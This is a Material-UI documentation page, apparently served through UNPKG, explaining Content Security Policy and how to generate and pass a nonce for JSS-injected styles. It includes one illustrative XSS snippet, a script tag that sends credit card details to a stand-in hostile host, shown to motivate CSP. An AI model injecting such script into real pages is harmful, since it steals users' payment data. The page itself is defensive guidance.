UNPKG

materialuiupgraded

Version:

Material-UI's workspace package

material-ui.com

mui-org/material-ui

56 lines (37 loc) 2.45 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# Content Security Policy (CSP) <p class="description">Material-UI supports Content Security Policy headers.</p> ## What is CSP and why is it useful? Basically, CSP mitigates cross-site scripting (XSS) attacks by requiring developers to whitelist the sources their assets are retrieved from. This list is returned as a header from the server. For instance, say you have a site hosted at `https://example.com` the CSP header `default-src: 'self';` will allow all assets that are located at `https://example.com/*` and deny all others. If there is a section of your website that is vulnerable to XSS where unescaped user input is displayed, an attacker could input something like: ``` <script> sendCreditCardDetails('https://hostile.example'); </script> ``` This vulnerability would allow the attacker to execute anything. However, with a secure CSP header, the browser will not load this script. You can read more about CSP [here](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP). ## How does one implement CSP? In order to use CSP with Material-UI (and JSS), you need to use a nonce. A nonce is a randomly generated string that is only used once, therefore you need to add a server middleware to generate one on each request. JSS has a [great tutorial](https://github.com/cssinjs/jss/blob/master/docs/csp.md) on how to achieve this with Express and React Helmet. For a basic rundown, continue reading. A CSP nonce is a Base 64 encoded string. You can generate one like this: ```js import uuidv4 from 'uuid/v4'; const nonce = new Buffer(uuidv4()).toString('base64'); ``` It is very important you use UUID version 4, as it generates an **unpredictable** string. You then apply this nonce to the CSP header. A CSP header might look like this with the nonce applied: ```js header('Content-Security-Policy') .set(`default-src 'self'; style-src: 'self' 'nonce-${nonce}';`); ``` If you are using Server Side Rendering (SSR), you should pass the nonce in the `<style>` tag on the server. ```jsx <style id="jss-server-side" nonce={nonce} dangerouslySetInnerHTML={{ __html: sheetsRegistry.toString() } } /> ``` Then, you must pass this nonce to JSS so it can add it to subsequent `<style>` tags. The client side gets the nonce from a header. You must include this header regardless of whether or not SSR is used. ```jsx <meta property="csp-nonce" content={nonce} /> ```